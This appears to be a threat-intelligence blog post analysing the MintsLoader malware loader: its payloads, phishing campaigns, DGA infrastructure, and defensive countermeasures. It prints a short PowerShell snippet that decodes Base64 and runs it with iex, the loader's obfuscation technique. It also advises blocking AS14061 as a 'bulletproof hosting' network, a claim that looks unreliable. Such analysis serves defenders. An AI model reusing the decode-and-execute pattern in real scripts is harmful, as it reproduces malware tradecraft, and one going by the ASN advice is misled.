MintsLoader has emerged as a sophisticated malware loader distributing payloads like GhostWeaver, StealC, and a modified BOINC client. Recorded Future’s analysis reveals its multi-stage obfuscation, anti-analysis checks, and use in phishing campaigns targeting industrial and legal sectors1. This article breaks down its technical mechanisms, infrastructure, and defensive countermeasures.
TL;DR: Key Findings
- Multi-Stage Loader: Delivers GhostWeaver (banking trojan), StealC (data stealer), and cryptojacking payloads.
- Evasion: JavaScript-to-PowerShell obfuscation, DGA-based C2 communication, VM/sandbox detection.
- Campaigns: Phishing (TAG-124), drive-by downloads (SocGholish), and invoice-themed lures exploiting Italy’s PEC system.
- Defenses: Recorded Future’s AI automates YARA rule generation and tracks DGA shifts.
Technical Analysis of MintsLoader
MintsLoader operates as a two-stage loader. Stage 1 uses obfuscated JavaScript to execute PowerShell scripts fetching Stage 2 payloads. Recorded Future observed Base64-encoded commands like the following snippet1:
$encPayload = "JHt2YXJ9PSR7ZW5jfQ==";
iex([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($encPayload)))Stage 2 implements anti-analysis checks, including VM detection via registry key enumeration and CPUID checks. Its Domain Generation Algorithm (DGA) dynamically creates C2 domains, evading static blocklists. Infrastructure relies on bulletproof hosting providers like SCALAXY-AS and abuses AWS/Azure for payload staging1.
Recorded Future’s AI-Driven Detection
Recorded Future processes 1.5 million malware samples daily, automating YARA rule creation and behavior tracking. Their platform integrates with Splunk for real-time IoC enrichment, enabling queries like “Show recent GhostWeaver activity in Europe” in plain English2. This reduces manual effort for SOC teams analyzing MintsLoader’s evolving TTPs.
Mitigation and Relevance
For defenders, Recorded Future recommends:
- Deploying YARA rules targeting MintsLoader’s PowerShell obfuscation patterns.
- Monitoring DGA-generated domains via DNS logs.
- Blocking known bulletproof hosting ASNs (e.g., AS14061).
Red teams can simulate MintsLoader’s tactics by replicating its multi-stage delivery and DGA-based C2 in controlled environments. Blue teams should prioritize sandbox analysis for JavaScript-initiated PowerShell execution.
Conclusion
MintsLoader exemplifies the trend toward modular, evasive malware. Its use of legitimate cloud services and DGAs complicates detection, but AI-powered tools like Recorded Future’s platform offer scalable countermeasures. Future variants may adopt deepfake-enabled phishing, underscoring the need for adaptive defenses.
References
- “Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting.” Recorded Future, 29 Apr. 2025.
- “Recorded Future AI Passes the Malware Turing Test.” PR Newswire, 29 Apr. 2025.
- “Recorded Future Launches Malware Intelligence to Automate Detection.” SiliconANGLE, 29 Apr. 2025.
